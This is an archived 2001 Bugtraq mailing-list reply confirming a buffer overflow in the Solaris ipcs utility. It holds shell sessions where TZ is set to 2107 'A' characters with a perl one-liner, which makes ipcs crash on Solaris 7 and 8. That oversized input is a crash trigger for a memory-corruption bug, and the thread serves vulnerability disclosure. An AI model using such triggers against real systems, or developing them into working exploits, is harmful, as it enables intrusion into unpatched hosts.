[20272] in bugtraq
Re: Solaris ipcs vulnerability
daemon@ATHENA.MIT.EDU (Robert Varga)
Tue Apr 17 15:27:48 2001
Mail-Followup-To: Robert Varga <nite@hq.alert.sk>, BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
protocol="application/pgp-signature"; boundary="tKW2IUtsqtDRztdT"
Content-Disposition: inline
Message-ID: <20010417123017.A26734@hq.alert.sk>
Date: Tue, 17 Apr 2001 12:30:17 +0200
Reply-To: Robert Varga <nite@HQ.ALERT.SK>
From: Robert Varga <nite@HQ.ALERT.SK>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <15067.23174.388984.783662@tempermental.cbl.umces.edu>; from
sinkr@CBL.UMCES.EDU on Mon, Apr 16, 2001 at 04:48:06PM -0400
--tKW2IUtsqtDRztdT
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Mon, Apr 16, 2001 at 04:48:06PM -0400, Robert Sink wrote:
> I've tried:
>=20
> TZ=3D`/usr/local/bin/perl -e 'print "A"x1107'`
>=20
> ...on... both 64 bit Solaris 8 and Solaris 7 (we have no 32 bit
> machines here) and cannot get the programs to crash. They just
> happily display the A's, plus the other information and exit normally.
>=20
> Solaris 7: SunOS xxx 5.7 Generic_106541-12 sun4u sparc
> Solaris 8: SunOS xxx 5.8 Generic_108528-05 sun4u sparc
>=20
> I keep the patches on the bleeding edge, but I can find nothing
> offhand in the latest patchdiag.xref that would have altered this.
>=20
> Am I missing something?
Seems Solaris 8 has larger buffer (my guess is 2k), yet it still overflows:
Solaris 8, 64bit:
[root@ias1 /root]# uname -a
SunOS ias1 5.8 Generic_108528-06 sun4u sparc SUNW,UltraAX-i2
[root@ias1 /root]# isainfo -b
64
[root@ias1 /root]# export TZ=3D`/usr/bin/perl -e 'print "A"x2107'`
[root@ias1 /root]# ipcs
Segmentation Fault (core dumped)
Solaris 8, 32bit:
[root@nite /root]# uname -a
SunOS nite 5.8 Generic_108528-06 sun4u sparc SUNW,Ultra-5_10
[root@nite /root]# isainfo -b
32
[root@nite /root]# export TZ=3D`/usr/bin/perl -e 'print "A"x2107'`
[root@nite /root]# ipcs
Segmentation Fault
Solaris 7, 64bit:
[root@dwhs /root]# uname -a
SunOS dwhs 5.7 Generic_106541-15 sun4u sparc SUNW,Ultra-Enterprise
[root@dwhs /root]# isainfo -b
64
[root@dwhs /root]# export TZ=3D`/usr/local/bin/perl -e 'print "A"x2107'`
[root@dwhs /root]# ipcs
Segmentation Fault
--=20
Kind regards,
Robert Varga
---------------------------------------------------------------------------=
---
n@hq.sk http://hq.sk/~nite/gpgkey.=
txt
=20
--tKW2IUtsqtDRztdT
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE63Bs59aKR2/T45h8RAiYMAJ9DZ/uUY1moe/YENu1sT9bAlxbvjQCggD23
mgRljPxfsVT5YVSvJ4ognjk=
=6Lqa
-----END PGP SIGNATURE-----
--tKW2IUtsqtDRztdT--
